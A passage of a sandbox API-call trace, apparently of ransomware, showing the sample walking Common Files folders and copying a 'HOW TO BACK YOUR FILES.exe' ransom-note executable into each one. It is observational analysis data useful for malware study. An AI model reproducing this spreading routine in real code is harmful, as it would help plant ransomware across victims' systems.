cAlternateFileName="")) returned 0x2ccda8 [0074.821] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.821] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.822] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US" [0074.822] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0074.822] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0074.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 49 [0074.822] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US" [0074.822] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.822] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.828] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.828] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5e19f5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e19f5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.828] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.828] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.828] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\MSMAPI", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\MSMAPI") returned="C:\\Program Files\\Common Files\\System\\MSMAPI" [0074.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df890 | out: hHeap=0x2b0000) returned 1 [0074.828] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0074.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\MSMAPI") returned 43 [0074.828] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\MSMAPI" | out: lpString1="C:\\Program Files\\Common Files\\System\\MSMAPI") returned="C:\\Program Files\\Common Files\\System\\MSMAPI" [0074.828] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.828] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\msmapi\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.833] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.833] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e1c5720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e1c5720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.833] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.833] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.834] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033") returned="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033" [0074.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0074.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0074.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033") returned 48 [0074.834] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033" | out: lpString1="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033") returned="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033" [0074.834] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.834] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.838] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.838] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e1c5720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e1c5720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.838] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.838] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.838] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\msadc", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\msadc") returned="C:\\Program Files\\Common Files\\System\\msadc" [0074.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df830 | out: hHeap=0x2b0000) returned 1 [0074.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0074.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc") returned 42 [0074.838] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\msadc" | out: lpString1="C:\\Program Files\\Common Files\\System\\msadc") returned="C:\\Program Files\\Common Files\\System\\msadc" [0074.838] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.838] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\msadc\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.844] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.844] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e1c5720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e1c5720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.844] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.844] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.845] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\msadc\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US" [0074.845] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0074.845] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0074.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 48 [0074.845] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\msadc\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US" [0074.845] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.845] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.853] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5e1eb880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e1eb880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.853] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.853] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.853] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\en-US") returned="C:\\Program Files\\Common Files\\System\\en-US" [0074.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df7d0 | out: hHeap=0x2b0000) returned 1 [0074.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0074.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\en-US") returned 42 [0074.853] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\System\\en-US") returned="C:\\Program Files\\Common Files\\System\\en-US" [0074.853] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.853] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.857] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.857] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5e1eb880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e1eb880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.857] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.857] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.857] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\ado", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\ado") returned="C:\\Program Files\\Common Files\\System\\ado" [0074.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0074.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado") returned 40 [0074.858] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\ado" | out: lpString1="C:\\Program Files\\Common Files\\System\\ado") returned="C:\\Program Files\\Common Files\\System\\ado" [0074.858] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.858] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\ado\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.863] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.863] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e2119e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2119e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.863] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.863] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.864] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\ado\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\ado\\en-US") returned="C:\\Program Files\\Common Files\\System\\ado\\en-US" [0074.864] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0074.864] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 46 [0074.864] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\ado\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\System\\ado\\en-US") returned="C:\\Program Files\\Common Files\\System\\ado\\en-US" [0074.864] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.864] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.868] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5e2119e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2119e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.868] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.868] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.868] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\SpeechEngines", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines") returned="C:\\Program Files\\Common Files\\SpeechEngines" [0074.868] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0074.868] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines") returned 43 [0074.868] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\SpeechEngines" | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines") returned="C:\\Program Files\\Common Files\\SpeechEngines" [0074.868] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.868] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\SpeechEngines\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\speechengines\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.873] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.873] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e2119e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e2119e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.873] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.874] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.874] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft" [0074.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 53 [0074.874] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft" | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft" [0074.874] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.874] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.899] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.899] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e25dca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e25dca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.899] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.899] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.899] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0074.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0074.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 59 [0074.899] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20" | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0074.899] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.900] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.900] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0074.901] GetLastError () returned 0x0 [0074.901] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.901] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.901] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.901] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.901] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0074.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0074.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 65 [0074.901] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0074.901] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.901] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.902] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0074.902] GetLastError () returned 0x0 [0074.902] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.902] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, 